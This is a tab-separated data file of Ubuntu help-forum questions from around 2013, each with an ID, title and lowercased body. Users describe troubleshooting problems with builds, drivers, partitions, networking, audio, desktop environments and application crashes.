374755	what package do i need to build a qt 5 & cmake application ?	i 'm trying to build sdrangelove , which wants qt 5 and uses cmake for its build system , on ubuntu 13.10 . what package do i need to install to give it the file it 's asking for here ? there are a lot of *qt5* packages , and i 've tried installing the promising looking ones to no effect . all the discussions i 've found either have things working fine or are talking about writing cmake build rules rather than executing them . i do n't have a lot of experience with the organization of debian/ubuntu packaging . cmake error at cmakelists.txt:14 ( find_package ) : by not providing `` findqt5core.cmake '' in cmake_module_path this project has asked cmake to find a package configuration file provided by `` qt5core '' , but cmake did not find one . could not find a package configuration file provided by `` qt5core '' ( requested version 5.0 ) with any of the following names : qt5coreconfig.cmake qt5core-config.cmake add the installation prefix of `` qt5core '' to cmake_prefix_path or set `` qt5core_dir '' to a directory containing one of the above files . if `` qt5core '' provides a separate development package or sdk , be sure it has been installed .
374757	colored vertical lines upon boot and nomodeset does not fix it	i have installed lubuntu 13.04 on a dell inspiron 1501 laptop , rebooted the machine and encountered this problem . i edited the grub configuration to remove `` quite splash '' and enter `` nomodeset '' , updated grub , and everything was fine . i could reboot the machine without any trouble . however , if i unplug the machine , wait a few seconds , and plug it back in , the problem with the colored lines comes back and nomodeset no longer helps to solve the problem . i tried using radeon.modeset=0 instead of nomodeset and that also works on multiple reboots until i unplug the machine and plug it back in . i was finally able to get around the problem by entering `` radeon.exapixmaps=0 '' instead of radeon.modeset=0 . i suppose i kind of made up that boot option using some information from an arch wiki page . this would work throughout reboots and even if i unplugged the laptop . it was working fine for quite a while . a few weeks later , i had some unrelated issues with the java iced-tea plugin , and since 13.10 had just come out , i thought i would try upgrading . so upgrading did n't fix the problem with java , and after unplugging the machine and trying to use it later , i was back to this problem with the black screen and colored vertical lines . i am completely out of ideas on what to try . it took me a week to figure out how to get it working the first time , but the solution i had is n't working anymore .
374758	librated error when creating partition table	i bought a dell inspiron 5521 laptop a few days ago that came with ubuntu preinstalled . i have n't used ubuntu yet , and i do n't have any experience in using it . i wanted to install windows 7 64-bit on my laptop alongside ubuntu , and made two bootable usb drives with gparted and windows 7 . there was n't a suitable partition on my laptop in which i could install windows 7 . i 've read the instructions for using gparted to create or manage my hard drive . i inserted the usb , booted from bios , and followed the procedure in installing gparted . then i entered gparted , and the following error occurred : librated error when creating partition table . it asked me to click on either ok or cancel . either way i had my hard disk shown to me in the user window , in partitions that were made by the manufacturer : partition file sys label size flags /dev/sda1 fat32 dellutility 300.00 mib diag /dev/sda2 fat32 os 3.00 gib lba /dev/sda3 ext4 912.46 gib boot /dev/sda4 extended 15.75 gib ( had a subpart ) /dev/sda5 linux-swap 15.75 gib ... and a option to switch to dev/sdb that 's unused and of capacity 3gib . i 've used the biggest partition 912.46 gib , and tried to reduce its size , and clicked ok. then when i tried to make a new partition , it said it ca n't make any more partitions , no more than a maximum of 5 . i would like to keep ubuntu and slowly learn , but i also need to use programs that work in windows . thank you for taking the time to answer my question .
374763	changed isp , ubuntu 13.04 wo n't connect to the internet	i recently moved and changed internet service providers . my ubuntu 13.04 machine is unable to connect to the internet . i need help with the networking settings . the previous isp was verizon dsl , current a cable company . both connect via ethernet cable . the cable and router work on a windows machine , but not my ubuntu machine . the cable company does n't support ubuntu or any linux operating systems . the computer seems to recognize the connection . when i unplug and plug in the cable i get a little window that says disconnected , connected . however , i ca n't connect to the internet in either firefox or the ubuntu software installer ( tried this to see if it was a firefox issue , it was n't ) . i tried shutting down and restarting , plugging and unplugging cables , etc .
374764	apache virtual host setup not working ?	i had follow this link to setup my first virtual host with apache2 under ubuntu 12.x . looks easy but is not working . [ how to ] [ 1 ] my internal dns can resolve the name , but my browsers is not showing me my webpage . from my lan , i 'm using ubuntu server no gui . every time i point to my virtual host name , i receive apache default page , i can not see my custom page . my docs are under /home/mydomain/public_html this is my settings : < virtualhost *:80 > serveradmin webmaster @ localhost servername example.com documentroot /home/example.com/public_html < directory / > options followsymlinks allowoverride none < /directory > < directory /home/example.com/public_html > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > the rest of the file is the same . no , i even try to change the port from *:80 to *:81 , restart and do n't see apache listen to port 81 . my localdns running in other machine works . what i forget ?
374766	installed 13.10 ubuntu in my hp laptop , after booting up , it does n't the display	i installed 13.10 and installation completed successfully but the display does n't come up after booting up from ubuntu screen . please help me troubleshoot this issue . asap
374767	ibus-avro for bengali not working in ubuntu 13.10	i 've upgraded from ubuntu 13.04 to ubuntu 13.10 , then ibus-avro for bengali is not working . i 've tried to reinstall ibus but no success . ibus-avro icon is showing but not sure whats the problem . it should be working like this ... the icon on top is showing properly , but it 's not working . may be there are some communication problem . so currently after upgrade it 's like this ... as we can see the bangla text is not appearing ... i 've tried these steps ... but no hope . rm ~/.candidate-selections.json and sudo killall ibus-daemon ibus-daemon -vx then /usr/bin/env gjs -- include-path=/usr/share/ibus-avro /usr/share/ibus-avro/main-gjs.js
374768	concerns about monodevelop	i would like to know if monodevelop stop supporting or releasing their program in ubuntu , thanks in advance any answer will help a lot .
374769	ubuntu 12.04 lts wo n't install - never finishes please help	want to try ubuntu after using windows for 30 years . tried to install it 5 times on a lenovo x120e notebook and twice on a lenovo m57 desktop . no luck , worse than what microsoft puts you through . i burned 12.04 lts to disc . it installs up to the `` who are you ? '' screen , then stops . accepted the recommended computer name and lower case user name . i chose `` log me in automatically . '' after that there is no progress bar , no rotating or pulsing button , nothing to indicate the ubuntu has not died or fallen asleep . is that how it is written ? never heard of a program that would take a long time to install while a user looked at a locked , dead screen . i just bought the m57 desktop for my son . it came with ubuntu 10 something . i wanted to upgrade to 12.04 but it crashed , twice , to a dos screen saying the pc lacked a certain `` init '' file . various help screen commands did not help . on the x120e , i thought a partial-failed ubuntu install was causing the problem , so i removed the drive and deleted the ubuntu partition and replaced it . but same result . after i fill in my name , accept computer and user name , the `` continue '' button does not appear to work . i can go `` back '' but not forward . i have waited torturous hours . it does n't take more than two hours to install , does it ? any it is my own fault because of the high expectations i had for a sensible , hassle-free installation , but i am immensely disappointed . thank you for any response
374773	lenovo w530 microphone problem	lenovo w530 running xubuntu 13.10 the microphone appears not to be working . 2 tests made one with audacity and a second with skype . in both instances there appears to be no input . 'input devices ' in the volume control module , also 'recording ' indicates background static only . i have opened alsamixer and ensured that everything including microphone boost is set to high . i have tried the changes to alsa-base.conf without success .
374776	`` this kernel required an x86-64 cpu , but only detected a i686 cpu ''	i recently decided to use virtualbox to run ubuntu , but i get the message this kernel required an x86-64 cpu , but only detected a i686 cpu i 've already enabled virtualization in bios , but that does n't seem to work . many other solutions suggest that i should download the 32-bit version , and not the 64-bit . i 'm not sure about that though , since my computer clearly says `` 64-bit operating system '' under systems . but i might just be mistaken .
374783	lfs programming on ubuntu	i figured out how to install lfs on ubuntu . instaled all packages required . but dont know where to start programming . 1 . how to program graphical interface ? 2 . file and memory management . 3 . mouse , keyboard functions . are these already there ? and should be only modified ? thanks ...
374785	w : failed to fetch ... .. 407 proxy authentication required	i removed the content of a file /etc/apt/apt.conf because i do n't use any proxy , but yet i have an error when i run sudo apt-get update : w : failed to fetch ... .. 407 proxy authentication required
374788	my ubuntu 12.04 showing error related to nautilus	i am in ubuntu 12.04 . here it showing an error related to nautilus . ( nautilus:1977 ) : critical ** : syncdaemon_status_info_get_online : assertion `syncdaemon_is_status_info ( sinfo ) ' failed how to fix it ?
374789	xfce4-notifyd bubble notification background not responding to theme	i 've managed to get gtk2 and gtk3 themes working nicely in xmonad on ubuntu , but now the xfce4-notifyd notification bubbles have this strange background : whilst all other settings respond to the configuration tool , the background remains like this . any pointers gratefully received .
374792	wifi connection problem in asus eee pc having broadcom bcm4313	i 'm a newcomer in linux.i 'm currently using ubuntu 12.04 . i used to use win7 but changed to linux for my asus eee pc 1225c . i 'm having a problem with the wlan adapter . i 've read a lot of posts but nothing helped . my drivers have been successfully installed ( thanx to `` additional drivers '' in system settings ) . now when i tried to use my laptop as a hotspot the other devices ( my dell laptop having win 7 and a samsung phone ) could't find it . i used to share internet from this laptop ( asus ) using virtual router plus in win7 and it used to work just fine . when i tried the other way around ( i.e . tried to share internet from my dell laptop running win 7 , using virtual router plus my phone could recognize the wifi ap but my asus laptop could n't find anything . on top of that after every 1 minute a pop up automatically appears saying `` wireless network disconnected '' . please help me out . i 've zero knowledge about linux . i 'd appreciate if you could give a step by step solution . thanx in advance p.s . -- my wired network is working just fine .
374793	error while creating new partition on sd card	my sd card was locked , using a nokia phone , and i had forgotten the password . so i cleared the sd card in my ubuntu 13.10 . when i tried to create a new partition , it showed the following error : error closing file . running the command : fdisk -l shows the sd card with a warning , which says : '' disk /dev/sdb : 4124 mb , 4124049408 bytes 127 heads , 62 sectors/track , 1022 cylinders , total 8054784 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sdb does n't contain a valid partition table . i also tried /dev/sdb and it shows : device contains neither a valid dos partition table , nor sun , sgi or osf disklabel building a new dos disklabel with disk identifier 0x0f0396db . changes will remain in memory only , until you decide to write them . after that , of course , the previous content wo n't be recoverable . warning : invalid flag 0x0000 of partition table 4 will be corrected by w ( rite ) then it asked for the command , and i created a new partition using 'n ' and tried to write using 'w ' and this was the result : the partition table has been altered ! calling ioctl ( ) to re-read partition table . error closing file what can i do to make it usable ?
374794	problem with rendering video in kdenlive with title	recently i wanted to render a short video clip in kdenlive which had title in beginning and end . the title was a simple text made by kdenlive . so , whenever i render the video with title , render stops in 0 to 4 seconds . i am using ubuntu 12.10 and the latest version of kdenlive .
374796	ubuntu developer video tutorial	i am visual studio .net developer . i like to check out `` ubuntu developer video tutorials '' for programmer and i want to develop application like vb.net desktop application ( standalone or web ) . is there any program like visual studio for ubuntu for desktop and web application ? and which programming language i need to learn in order to develop application for ubuntu .
374800	unable to ping from ubuntu virtual machine in gns3	i 'm currently implementing ipv6 in gns3 with router 2691 , hyper-v server ( virtualbox ) and ubuntu 12.04 ( virtualbox ) . my router and hyper-v server able to ping ubuntu vm but its not vice versa . can anyone give me some idea on solving this problems ? thanks and regards .
374802	how to restore android in xperia s	factory images are seems to be available for nexus only . what if i wished to roll back to android . it seems many enthusiastic users have already loaded ubuntu touch on their devices . please advise !
374803	only flashing curser after abort of update	about 5 months ago ubuntu 13.04 was installed on a friends pc . everything has been working well until last night . whilst looking at a site on the internet , he had a message from ubuntu informing him it was loading update . because message was blocking part of screen , he clicked on update window . which he is unsure weather the update was stopped at mid stream . the result is , now when he starts the pc he gets the ubuntu screen first and then it goes to a black screen with a flashing curser . any help would be much appreciated . thanks .
374805	modbus simulator / vmware	i am new on this forum and not a very experienced ubuntu user . let 's say more like a homeuser . i am en automation engineer an i use software installed on virtual machines to program industrial plc 's . since now i have only used windows for work and ubuntu at home . sincer the support for vmware has increased in ubuntu i would like to use linux also for work and these are the problems that stop me : 1 ) i could not succeed in installing vmware player . i do n't know what happen ... seems that the installer needed to modify something in the kernel and there i stopped i tried different solutions from forums ( in a pretty chaotic manner ) and ended up reinstalling the system . can any one direct me to a precise procedure of installing vmware player on ubuntu 13.10 2 ) i can not find any working modbus/profibus gui simulators . ty .
374811	ubuntu 13.10 ftp connection attempt failed with `` econnrefused - connection refused by server	i have done a little google searching on this one , but im not really finding a solution that is helping . i have unbuntu 13.10 lamp ( 64bit ) installed on vm-virtualbox running on windows 7x64 . after trying to set up the lamp using tasksel ( a complete failure ) , i ended up installing all components through the gui using synaptic without any problems . i have then installed a wordpress website on the lamp and am able to access it both locally on the virtual machine and via my static ip address over the web from my iphone . i am now having problems with permissions i believe as i am unable to add/remove plugins and media to the site.it brings up an ftp connection window asking for details and when i insert the appropriate information i get errors such as from wordpress error : there was an error connecting to the server , please verify the settings are correct . if i then try to connect remotely using file zilla connection attempt failed with `` econnrefused - connection refused by server i have another virtual machine running ubuntu 12.04 lamp with wordpress installed . i dont have any problems ftp'ing to that system from within wordpress or using filezilla . i cant for the life of me figure out what i have done differently ? ? ? is the ubuntu 13.10 apache2 server not listening ? ? ? what are the most common causes of an `` econnrefused '' response from the server ? is there an web server dependency that should have been installed that synaptic missed ? ? ?
374813	correct /etc/network/interfaces config for a tun6to4	i am trying to get the following in /etc/network/interfaces : ip tunnel add tun6to4 mode sit ttl 254 remote 77.111.111.200 ip link set dev tun6to4 up ip addr add 2001 : aaa : bbb:1 : :1/64 dev tun6to4 ip route add 2001 : aaa : bbb:2 : :/64 via 2001 : aaa : bbb:1 : :2 i have put the following in there , but this does n't seem to work , can someone point out what the correct setup is ? auto tun6to4 iface tun6to4 inet6 v4tunnel address 2001 : aaa : bbb:1 : :1 netmask 64 ttl 254 endpoint 77.111.111.200 up ip link set mtu 1280 dev tun6to4 up ip route add 2001 : aaa : bbb:2 : :/64 via 2001 : aaa : bbb:1 : :2
374814	ca n't install ubuntu on axioo laptop	i ca n't install ubuntu 12.04 on my axioo laptop . specifications : intel dual core cpu 512mb ram vga sis 671 i 've been browsing everywhere and found that inserting the string noapic acpi = off pnpbios = off was successful , and the problem is that after the install it was blank after booting ubuntu and restarting again . can anybody help me ?
374816	edit bookmark menu appears frequently	i am new to ubuntu . edit bookmark menu always appears in ubuntu.this causes my web browser to flash and i am unable to browse the net
374817	how i can install wordpress & joomla in ubuntu 13.04 ?	i am new in linux . i already install lampp server with php my admin in ubuntu 13.04 . but i can not install any cms like wordpress , joomla & can not access from browser address bar . please help me .
374824	unable to remove red circle with white line	i recently tried to update ubuntu 12.04 on my computer , but i am unable to do this because a red circle with a white line at the top of my screen . when i run the update in the terminal , i get this error message : e : type ' < ! doctype ' is not known on line 1 in source list /etc/apt/sources.list.d/playonlinux.list e : the list of sources could not be read . what to do ?
374830	get rhythmbox debugging info	i 'm having a weird problem with rhythmbox that no one else seems to have . when i pause on any audio cd , i ca n't get rhythmbox to play it again . i 've tried various workarounds including trying to play next/previous track , trying to manually move the seek bar , etc . but to no avail . when this happens i 've no choice but to remove the cd from my drive and insert it again . there does not seem to be anything weird with my system when this happens , apart from the fact that rhythmbox is n't playing as it is supposed to . is there anything i can do to get more info on why rhythmbox is acting up as such ?
374831	gnome shell 3.8 wont display background	i am using gnome-shell 3.8 my desktop has a background . but when i get to the luncher the background disappears . when i am recording the desktop it sometime reappears . i 'm using an amd hd7950 and have tried proprietary and open source my video : http : //www.youtube.com/watch ? v=ged7vx9n0ec
374832	what is the user interface design of ubuntu server ?	can someone explain to me the gui and cli of ubuntu server ?
374834	no launcher , no dash , no unity , how to get back to my desktop ?	fyi , i have tried these , but none worked as of yet ! please help ! i must not want to reinstall ubuntu precise : askubuntu : unity launcher missing askubuntu : unity does n't load youtube : restore missing launcher askubuntu : unity 3d no longer works ! is there any other way to find a solution , any help is highly appreciated ! please do ask for any further info u may need to point me to a better direction . edit : i have still the opportunity to use ctrl+alt+t for the terminal . and from there i used firefox & to get the browser on . edit 2 : tried to find more ; found more explained situation http : //askubuntu.com/q/260578/176470 . edit 3 : @ adithya : tried that no luck ! here is what my terminal gave me so far ... [ 1447:22 ] ( ~ ) bash $ unity -- reset warning : unity currently default profile , so switching to metacity while resetting the values unity-panel-service : no process found checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins initializing core options ... done compiz ( core ) - warn : failed to receive configurenotify event on 0x1600004 compiz ( core ) - warn : failed to receive configurenotify event on 0x30000b8 compiz ( core ) - warn : failed to receive configurenotify event on 0x2c00fc1 initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing vpswitch options ... done initializing snap options ... done initializing mousepoll options ... done initializing resize options ... done initializing place options ... done initializing move options ... done initializing wall options ... done initializing grid options ... done initializing session options ... done initializing gnomecompat options ... done initializing animation options ... done initializing fade options ... done compiz ( core ) - error : could n't load plugin '/usr/lib/compiz/libunitymtgrabhandles.so ' : /usr/lib/compiz/libunitymtgrabhandles.so : undefined symbol : _zn10compoption7setnameepkcns_4typee compiz ( core ) - error : could n't load plugin 'unitymtgrabhandles' initializing workarounds options ... done initializing scale options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing ezoom options ... done compiz ( core ) - error : could n't load plugin '/usr/lib/compiz/libunityshell.so ' : /usr/lib/compiz/libunityshell.so : undefined symbol : _zn10compoption7setnameepkcns_4typee compiz ( core ) - error : could n't load plugin 'unityshell' compiz ( core ) - warn : unhandled configurenotify on 0xc000a0 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0xc000a3 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0xc000a6 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . initializing addhelper options ... done initializing animationaddon options ... done initializing annotate options ... done initializing bench options ... done initializing blur options ... done initializing clone options ... done initializing colorfilter options ... done initializing commands options ... done initializing crashhandler options ... done initializing cube options ... done initializing cubeaddon options ... done initializing extrawm options ... done initializing fadedesktop options ... done initializing firepaint options ... done initializing group options ... done initializing imgjpeg options ... done initializing kdecompat options ... done initializing loginout options ... done initializing mag options ... done initializing maximumize options ... done initializing mblur options ... done initializing neg options ... done initializing notification options ... done initializing obs options ... done initializing opacify options ... done initializing put options ... done initializing reflex options ... done initializing resizeinfo options ... done initializing ring options ... done initializing rotate options ... done initializing scaleaddon options ... done initializing scalefilter options ... done initializing screenshot options ... done initializing shelf options ... done initializing shift options ... done initializing showdesktop options ... done initializing showmouse options ... done initializing splash options ... done initializing staticswitcher options ... done initializing switcher options ... done initializing td options ... done initializing thumbnail options ... done initializing trailfocus options ... done initializing unitymtgrabhandles options ... done initializing unityshell options ... done initializing wallpaper options ... done initializing water options ... done initializing widget options ... done initializing winrules options ... done initializing wobbly options ... done setting update `` main_menu_key '' setting update `` run_key '' anything suspicious herein ?
374836	could not init glx in minecraft	-- -- minecraft crash report -- -- // daisy , daisy ... time : 11/10/13 1:51 am description : initializing game org.lwjgl.lwjglexception : could not init glx at org.lwjgl.opengl.linuxdisplaypeerinfo.initdefaultpeerinfo ( native method ) at org.lwjgl.opengl.linuxdisplaypeerinfo. < init > ( linuxdisplaypeerinfo.java:61 ) at org.lwjgl.opengl.linuxdisplay.createpeerinfo ( linuxdisplay.java:788 ) at org.lwjgl.opengl.drawablegl.setpixelformat ( drawablegl.java:61 ) at org.lwjgl.opengl.display.create ( display.java:846 ) at org.lwjgl.opengl.display.create ( display.java:757 ) at org.lwjgl.opengl.display.create ( display.java:739 ) at atv.o ( sourcefile:297 ) at atv.d ( sourcefile:599 ) at net.minecraft.client.main.main.main ( sourcefile:101 ) a detailed walkthrough of the error , its code path and all known details is as follows : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- head -- stacktrace : at org.lwjgl.opengl.linuxdisplaypeerinfo.initdefaultpeerinfo ( native method ) at org.lwjgl.opengl.linuxdisplaypeerinfo. < init > ( linuxdisplaypeerinfo.java:61 ) at org.lwjgl.opengl.linuxdisplay.createpeerinfo ( linuxdisplay.java:788 ) at org.lwjgl.opengl.drawablegl.setpixelformat ( drawablegl.java:61 ) at org.lwjgl.opengl.display.create ( display.java:846 ) at org.lwjgl.opengl.display.create ( display.java:757 ) at org.lwjgl.opengl.display.create ( display.java:739 ) at atv.o ( sourcefile:297 ) -- initialization -- details : stacktrace : at atv.d ( sourcefile:599 ) at net.minecraft.client.main.main.main ( sourcefile:101 ) -- system details -- details : minecraft version : 1.6.4 operating system : linux ( i386 ) version 3.5.0-43-generic java version : 1.7.0_25 , oracle corporation java vm version : openjdk client vm ( mixed mode , sharing ) , oracle corporation memory : 5249672 bytes ( 5 mb ) / 26349568 bytes ( 25 mb ) up to 518979584 bytes ( 494 mb ) jvm flags : 1 total ; -xmx512m aabb pool size : 0 ( 0 bytes ; 0 mb ) allocated , 0 ( 0 bytes ; 0 mb ) used suspicious classes : no suspicious classes found . intcache : cache : 0 , tcache : 0 , allocated : 0 , tallocated : 0 launched version : 1.6.4 lwjgl : 2.9.0 opengl : ~~error~~ runtimeexception : no opengl context found in the current thread . is modded : probably not . jar signature remains and client brand is untouched .
374838	is it recommended to install `` lts hardware enablement stack '' for intel gma-500 issues ?	i have xubuntu-12.04 lts on my sony vaio p with intel gma-500 graphics for more than a year . i have solved some issues using the fixes suggested in the poulsbo-wiki but unfortunately some issues still remain ... most importantly : i 'm unable to use external displays for presentations ! the kernel version of my installation is 3.2 . i 've read and heard that most problems regarding the intel gma-500 graphics cards are solved with the 3.4 linux kernel and newer versions . also , i 've read about the `` lts hardware enablement stack '' for 12.04 , which provides back-ports of the stable-kernels + x-stacks of 12.10 quantal ( linux-kernel-3.5 ) and 13.04 raring ( linux-kernel-3.8 ) for 12.04 lts . it seems that even the new-kernel + x-stack of 13.10 saucy will also be made available for 12.04 lts , but at the current time , i only see the kernel in repos , and not the x-stack . more detailed info : lts hardware enablement stack so my question is : is it recommended for me to install this `` lts hardware enablement stack '' in hope of resolving my issues with intel gma-500 graphics ? ! if yes , which one is more recommended ( quantal or raring ) ? !
374839	how to i configure which audio hardware is being used by pulse audio , alsa , and jack audio ?	here 's my setup toshiba laptop with internal sound card , hdmi digital sound out , and a external m-audio conectiv usb sound card ( 4-in/4-out equating to 2 sets of stereo ins/outs ) . i use this setup for recording music , and djing . i 'm trying to figure out how to get a similar setup to how i use these devices in windows ( roughly ) . when i use mixxx dj software i 'm able to select all the outputs of my m-audio sound device by sending one deck to one set of outputs , and the other set to the other set of outputs so i can use my external mixer . this is n't the problem , but this illustrates my point later on . the point here , is that i 'm able to use both outputs at the same time with this software . now , after i sucessfully setup jackaudio and am using ardour 3 for recording/producing i realized that jackaudio does n't see all my inputs/outputs of my m-audio sound card . it only sees one set of input/outputs ( one half of the card ) . and pulse audio is using the other set of outputs . so , for instance if i have ardour running on the first set of outputs , i can use audacious and play mp3 's which defaults to the other set of outputs ( granted it locks up because jack locks the device up . the problem is that when i configure jack audio , i notice that only half of the outputs from my m-audio device show up in the control panel . at one point of time in the past i remember being able to use jackaudio to access both sets of in/outs on my m-audio card . i 've also noticed that when i look up the alsa panel , alsa is using the set of outputs that jackaudio has access to , and pulse audio is using the other set . ( granted in pulse audio my internal laptop audio is set to the default output ) . my suspicion is that pulse audio is grabbing the set of outputs that jack audio can utilize , and is blocking it from appearing in the jack audio preferences . so i think that if i can find out how to get pulse audio to `` let go '' of the set of outputs that jack audio ca n't get , it 'll work . so , as of now in my pulse audio control panel i have access to -built-in audio -hdmi audio -m-audio dfu runtime ( using channels 3/4 as outputs ) alsa has access to everything as well , however the outputs of the m-audio card are the 1/2 output . i want to be able to access simultaneously all the ins/outs of the m-audio card with jack audio so i can route to external analog mixer . so , how can i define with audio device is controlled by alsa , pulse audio , and ultimately jack audio ?
374841	does ubuntu 13.04 support avx instruction set ?	i am using ubuntu 13.04 . i want to know if it supports avx instruction set . please let me know . thanks in advance .
374848	how do i recover files from u1 cloud	ok i have just stopped syncing a folder . this appears to have been a huge mistake . i did not realise the folder would disappear from my cloud storage . i assume ( and hope ) the sub-folders/files it contained still exists in the cloud . i hope they still exists in the cloud because they do not exist on my computer . i did not delete these files from the cloud ( i have tried to recover deleted files - none are being recovered ) . where are they and how do i get them back into my storage ?
374849	kdevelop 4.5.2 on ubuntu 12.04 ? errors	i want to install kdevelop 4.5.2 on ubuntu 12.04 i ran sudo apt-get install kdevelop 4.5 in the terminal and the installation had a few errors but things looked fine . if i run kdevelop i get the following error could not find ktexteditor : :factory , check your installation : make sure that kate is installed , kdedirs is set properly and that you ran kbuildsycoca4 . i tried to install kate but i got errors since ubuntu 12.04 does not support kdevelop 4.5.2 officially . does that mean i 'll have to build from source ?
374851	firefox always not responding / crashed / not work on ubuntu 13.10 64 bit	hy gays i am installing ubuntu on my laptop { compaq 510 , 2gb ram } anf os ubuntu 13.10 but firefox always crashed / not responding and this is always forcing me to reboot my laptop when crash i can not run any application even terminal ( ctrl + alt + t ) screen picture , and give me a solution to this problem whether ubuntu 13:10 with my device or anything else ? ?
374855	scan problem -fujitu scansnap s1300i	i 'm trying to install a scansnap s1300i scanner on ubuntu 13.10 . it is still not working . my question : with a sudo scanimage -l command , i receive the response : device `hpaio : /net/photosmart_c5100_series ? zc=hpba915d ' is a hewlett-packard photosmart_c5100_series all-in-one device `epjitsu : libusb:002:011 ' is a fujitsu scansnap s1300i scanner while , with a scanimage -l command i receive the response : device `hpaio : /net/photosmart_c5100_series ? zc=hpba915d ' is a hewlett-packard photosmart_c5100_series all-in-one what can go wrong ? this is probably a part of the problem . update : simple-scan do not work while sudo simple-scan works
374861	ubuntu touch official hardware ?	i really like the look of ubuntu touch and i want it asap , however , i am not willing to buy a device simply to port ubuntu touch on it . i do n't want to void all warranties and take any risks . therefore , i am really just waiting for official ubuntu touch hardware ( devices made for ubuntu touch ) . i ca n't find any rumours or estimated release dates online , in fact , i ca n't find out anything at all . can anyone ? if so , what and where ? when do you think they 'll be official hardware ? what price do you think it 'll be ? do you think canonical/ubuntu will manufacture it themselves ? thanks , zach
374865	no23 recorder for ubuntu	i have recently changed to ubuntu 12.10 from windows and i 'm very happy with it . there are a couple of things i 'm still figuring out especially am looking for a ubuntu version or alternative to no23 recorder which is a really useful tool to record anything audio , for example you are listening to live stream radio & you can record it with no23 recorder . i would be very grateful for any advice on that . kind regards misa
374868	new outlook double ( two step ) authentication on mail clients like thunderbird	i am using thunderbird without any issue until i enabled two way authentication in my outlook account . since then on start up , my thunderbird is asking to enter a new password and i have to recreate a new apppassword by going to my account settings via browser . any good alternative to this procedure ? ? thanks in advance : )
374869	tomcat7 server - ca n't install into eclipse kepler ?	i installed : eclipse kepler tomcat7 at /usr/local/tomcat7 when i start tomcat $ catalina_home/bin/startup.sh and go to myip:8080 i see correct page and now when i want to add tomcat7 at eclipse ( at server view ) i choose : add new server = > choose tomcat7 the finish button is disabled . i ca n't figure out why this happen . i can install other servers for example - jboss but why i could n't add new tomcat server ? how to solve this trouble ?
374870	home directory not being created	i am trying to understand system administration on ubuntu . so , as an example , i create a dummy user using sudo useradd -d /home/linda linda and the passwd to create a the password . i check that an entry has been made using cat /etc/passwd linda : x:1004:1004 : :/home/linda : /bin/sh however , when i su - linda , i get no directory , logging in with home=/ and indeed , no home directory has been created . what am i missing ? thanks .
374871	what partition playonlinux and wine software has to be installed to ?	i 'm using ubuntu 12.04 and if i have already created ext4 ./ ( partition ) and on the same volume i have ./home if i create a separate partition ./home will the software that i install for example from ubuntu download center will automatically go to ./home ( partition ) or still ./ ( root ) ? i 'm using playonlinux and wine and all its software only installs to ./home ( file system disk ) where emulated copy of windows xp installed also and it 's a lack of space .
374873	removed plymouth made my ubuntu lost	i had removed plymouth using sudo apt-get remove plymouth this also removed all other packages like ubuntu-desktop. , grub. , unity. , etc.. now i 'm not even getting tty . is there any way to get back everything or should i need to start again with a fresh copy of ubuntu
374876	no sound after alternate boot my laptop	i have ubuntu 13.04 . every alternate time i boot my laptop there is no sound in any music or movies . i have to reboot it and and there is audio and while rebooting it doesnt even shutdown properly and i have to use the power button every time . kindly advise quickly . thanks .
374877	trying to launch application in full screen mode on boot	i 'm trying to write a bash script to launch xbmc in full screen mode using wmctrl . i 'm using wmctrl so i do n't lose the ability to alt-tab , etc and get back to the desktop/gui if i need to , since running xbmc in full screen mode only allows me to go to tty unless i exit the application . my script looks like this : # /bin/bash xbmc -- standalone sleep 5 wmctrl -r xbmc media center -b toggle , fullscreen xbmc launches fine , but wo n't go into fullscreen mode . however if i run wmctrl with the same parameters while xbmc is already open , it will toggle it into full screen mode . is there something wrong with my script ? i do n't really know much about linux , so any help would be appreciated !
374880	restore music folder & shortcut	i was sorting out my music collection and accidentally deleted my ( empty ) ~/music folder . now , there is no shortcut in the files/nautilus sidebar , and if i create a new ~/music , i am unable to restore its shortcut and folder icon . how can i restore this default behaviour for the ~/music folder ? thanks !
374889	ubuntu hangs after starting with issue pointer to flat panel invalid message	i am trying to install ubuntu 13.10 and i am having issues with the process . after i install when i restart i get the message , pointer to flat panel invalid message in dos screen and then gui loads but its very unresponsive and if i click on web browser or anything it just hangs and does n't work at all . here is my configuration : intel core2duo processor 2.2ghz , dell flat monitor 17 inch , 4 gb of ram . anyone have idea about this ? i tried to install ubuntu gnome , xubuntu as i believed its the problem with unity but they have the same problem . i am really frustated now as i am not sure what to do because if i install windows it works fine : ( i also tried to install vga driver nvidia from additional drivers when i got lucky with 13.10 as system worked for a while . but when i rebooted it just crashed and hangs at the boot . thanks . hardik
374892	star wars kotor 2 problems	im an uber newbie to linux , considering i was a windows nut , i think ubuntu is so good . however as im new to this os i have no idea about problem solving and any command prompts i have found and copied . i have tried to install sw kotor 2 using playonlinux as its a gui ! ! however its not working and was hoping someone could help me . i have checked the forums and blogs but seems no-one has had the same problem as me . i cant even get to the configuration suite to test my graphics and sound cards . i meet and beat minimum specs , just cant get that far ! ! please help !
374893	minimal bash like promt when installing ubuntu	the problem is that i can not install ubuntu on dualboot with windows 8.1 because it gave me : '' gnu grub version 1.97 '' beta 4 [ minimal bash-like line editing is supported.for the first word , tab lists possible command completions . anywhere else tab lists possible device/file completions ] sh : grub > `` any ideas ?
374894	server script that sends an email every time the global ip changes	i 'm setting up a web server that wont have a static global ip . it will be at my parents house and i wont be able to ssh into it when the global ip changes . the global ip will change every time router is restarted which happens like once a month . i need a script that sends me an email every time the global ip changes . so i can update the dns so my website will work again . i do n't know anything about scripts in ubuntu , but i know the basics in java and php . computer : ubuntu 13.10 server , imac g4 globe .
374895	is something wrong with my bios ?	because kernel log said that my dmar is invalid or something . here 's a tar.gz of my fwts and stuff : http : //www.filedropper.com/fwts-dsdtga-z87x-ud3htar do n't have enough reputation to create the new tag dmar .
